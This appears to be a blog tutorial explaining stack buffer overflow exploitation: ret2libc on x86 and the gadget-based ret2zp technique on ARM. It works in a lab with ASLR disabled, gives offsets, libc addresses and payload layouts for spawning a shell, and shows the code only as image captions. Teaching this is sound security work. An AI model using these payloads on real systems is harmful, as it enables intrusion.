Demystifying "Return-to-Zero-Protection" on ARM

Demystifying "Return-to-Zero-Protection" on ARM

. 9 min read

The security community is well versed with the x86 architecture which has been around for several decades. In contrast, ARM is fairly new. In today's age as we move on to smaller and portable devices, there's has been a proliferation on the use of ARM processors for such devices. ARM is a natural choice owing to be less power hungry in contrast to mainline x86 processors. However, being power efficient doesn't mean its less capable in any way. We do have high end ARM processors that are not only gentle on the battery but also able to deliver the extra power to sustain a compute intensive workload. This is made possible by several architectural choices which are beyond the scope of this post.

It thus does make sense to get acquainted with exploitation on ARM based devices both from an attacker's and defender's perspective. Being familiar with x86, we would naturally want to translate our existing knowledge to ARM. However, many of the techniques of x86 exploitation doesn't map one-to-one with ARM. To bypass No Execute (NX), the Return-to-Libc (ret2libc) technique is often used on x86. This does not work on ARM. In this post, we are going to look into ret2libc and the reason why it fails on ARM. We will also look at Return-to-Zero-Protection (ret2zp) as an alternative, which overcomes all the limitation of ret2libc as applied to ARM systems.

ARM-Video-Course-Launched

Return-to-Libc : A primer

To keep things simple, we will turn off Address Space Layout Randomization (ASLR) for our exercises. This can be done by running

Disabling ASLR

Now consider the code below.

The source code

The buffer overflow bug in the do_echo function is obvious. The gets function is used to take input to a fixed size buffer of 100 bytes. If we supply more than 100 bytes we will overflow the buffer, potentially overwriting other values on the stack. On x86 the return address is also stored on the stack. So its possible to redirect execution to any point of our choice by overwriting the return address with a suitable value. Suppose we want to pop a shell. In this case, we can redirect execution to the system function in libc. The system function takes in one parameter - a pointer to a null terminated ASCII string denoting the command to execute.

On x86, the calling convention mandates function arguments to be passed on the stack. In our case, when we hit system, it will expect the pointer to the command string to be on the stack as well. The buffer overflow bug already gives us control of the stack. It is thus a matter of crafting a proper string to satisfy all the constraints.

The code is compiled with the following flags. We are compiling for x86 as the target and that's why we specify the -m32 flag. The -fno-stack-protector disables the Stack Smashing Protection for simplicity.

Compiling the source

First, we need to find out which part of our input string overwrites the saved return address. We can use pwntools for generating a large string.

Using pwntools for generating a string

Next, debug the binary in gdb (gdb -q ./echo-x86 ). The disassembly of do_echo looks like this.

The disassembly of do_echo

We set a breakpoint on the last instruction of do_echo at 0x80484c1. Run the program and provide the pwntools generated string as input.

Feeding the pwntools string to our binary

We hit the breakpoint instantly.

Breakpoint is hit

We are paused on the ret instruction. This instruction pops a dword from the stack and transfers execution to that address. Register esp points to the top of stack - 0xbffff18c. The topmost dword on the stack is "daab" (in ascii). [Note: "daabeaab" is a qword and we only need the topmost dword]. The ret instruction will treat this as the return address and try to jump it which will obviously crash the program.  Now, we want to find out the offset of "daab" in our input. Again, we use pwntools.

Finding the offset

"daab" is at an offset of 112. It means whatever we put at this offset will be treated as the return address. We want to jump to system, so lets find out its address.

Finding the address of system

This is the value we want to put at the specified offset. Next, we need the pointer to the string denoting the command to execute. Let's search for /bin/sh.

Finding the address of /bin/sh

/bin/sh is at 0xb7f649ab. That is all the information we need. Our exploit string will look something like this.

Layout of the exploit string

First 112 bytes are for filling up the buffer. Then we put the address of system and at the end, we have the address of the string "/bin/sh". In between, we put another value - the fake return address. Now, what is the purpose of this? The reason for putting this value is due to the way function calls work on x86. The call instruction on x86 implements function calls. This instruction jumps to the specified address while pushing the return address on the stack. Thus, when we are within system, the topmost dword on stack should be the return address followed by the function arguments. The return address for our case doesn't matter so we can put any value here.

To generate the exploit string, we will use a Python script.

Generating the exploit

To simulate the program running on a remote server we will use netcat. The Python script will connect to the specified port and send in the exploit string. As we see below, the exploit worked and we get a shell!

Ret2Libc exploit was successful

This exploitation method is known as Return-to-Libc. It is called so because we redirect execution to system which is a function in  libc. At the start of this post we mentioned that ret2libc is not possible on ARM i.e. if we want to exploit the exact same program but compiled for ARM then this technique won't work.

Why Return-to-Libc is not possible on ARM?

ARM is different from x86. In particular, on ARM the first four arguments to a function are passed in registers R0, R1, R2 and R3 respectively. Remaining arguments (if any) are passed on the stack akin to x86. In ret2libc we redirected execution to the system function which takes just a single parameter. The calling convention on ARM mandates this argument to be passed in R0. Exploiting a buffer overflow we only get control of the stack not the registers. So while on one hand its possible to redirect execution to system, on the other we cannot set the value in R0. This makes ret2libc ineffective on ARM.

Introducing Return-to-Zero Protection

Although we cannot control the registers which is necessary for a successful ret2libc attack but we do have control of the return address. On ARM, the return address is stored in the Link Register (LR). The value in LR is saved on the stack by the function prologue and consequently its restored in the function epilogue when it's done executing. To make this clear lets compile the same code for ARM within a Raspbian virtual machine. Hugsy, the author of GEF has provided pre-configured VMs for several architectures including ARM. You can download the armv6-stretch VM from the Google Drive link to practice.

The echo.c file is compiled with the following flags on the Raspbian Virtual Machine.

Compiling for ARM

As usual disable ASLR like before. Running the binary on GDB (gdb-multiarch -q ./echo-arm) the assembly code for do_echo looks like

Disassembly of do_echo on ARM

The first instruction at 104c8 pushes the value in the Link Register (LR) on the stack. The LR register stores the return address. Near the end of the function at 104f4 the saved return address is restored to the Program Counter which has the same effect as jumping back to the caller. Similar to ret2libc we can overflow the stack buffer and overwrite the saved return address. However this doesn't give us control of the registers.

In this case instead of redirecting execution to system we jump to another location, a series of instructions (gadget) which loads values from the stack to the register. Thus, in an indirect way we gain control of the registers.

ARM-Video-Course-Launched

If we look at the disassembly of lrand48 which is a libc function, the series of instructions from 0xb6ea2fd4 loads register R0 from the stack, increments the stack pointer by 12 before popping a dword and jumping to it. This is exactly what we require. The ldr r0, [sp, #4] instruction gives us control of register R0 and pop {pc} allows us to redirect execution to system after executing this gadget.

The disassembly of lrand48

Hence we need to craft the exploit string in such a way so as to jump to this gadget first which will set R0 to the address of the string "/bin/sh". The required addresses can be found out in gdb while debugging the binary.

Address of system and "/bin/sh"

Debug the program using gdbserver on the Raspbian VM and connect to it from the host using gdb-multiarch. Now, let us set a breakpoint at the last instruction of do_echo at 0x104f4. This is for finding the offset of the part of the input which will overwrite the return address.

Disassembly of do_echo for the echo-arm binary

Back in the Raspbian VM provide a pwntools generated string as the input.

Feeding a pwntools generated string

The breakpoint will be hit as shown below.

Overwriting the PC

Now lets inspect the stack. The pop {r11, pc} instruction will load "zaab" and "baab" into registers R11 and PC respectively. "baab" overwrites saved the return address. Using pwntools we can find the offset as we did before.

Finding the offset

The dword at offset of 104 will overwrite the return address. We can now write a Python script to generate the exploit string.

The code for ret2zp

The first 104 bytes are for filling up the buffer. Then we put the address of the gadget in lrand48. This is where execution will initially go. The gadget will load R0 with the dword at [sp + 4], hence we need to put a 4 byte placeholder to adjust for this before putting in the address of "/bin/sh". Next, the stack pointer is incremented by 12. To compensate for this, we need to put in another 4 byte filler before finally putting in the address of system.

Just as before, we use netcat to simulate a remote server and run the binary. Back on out host, running exploit.py we get a shell.

Ret2zp exploit was successful

This is how the Return-to-Zero Protection technique work. In short, it is similar to ret2libc but it's a two step process where we first redirect execution to a gadget to give us control of the registers before finally jumping to system.

That's all for this blog post. Finally, I would like to add that we have recently launched a video based training course on ARM exploitation where you will be able to learn and understand similar techniques like this. If you are interested I would highly recommend to give it a try. If you have any question or queries feel free to leave a comment below.

ARM-Video-Course-and-Book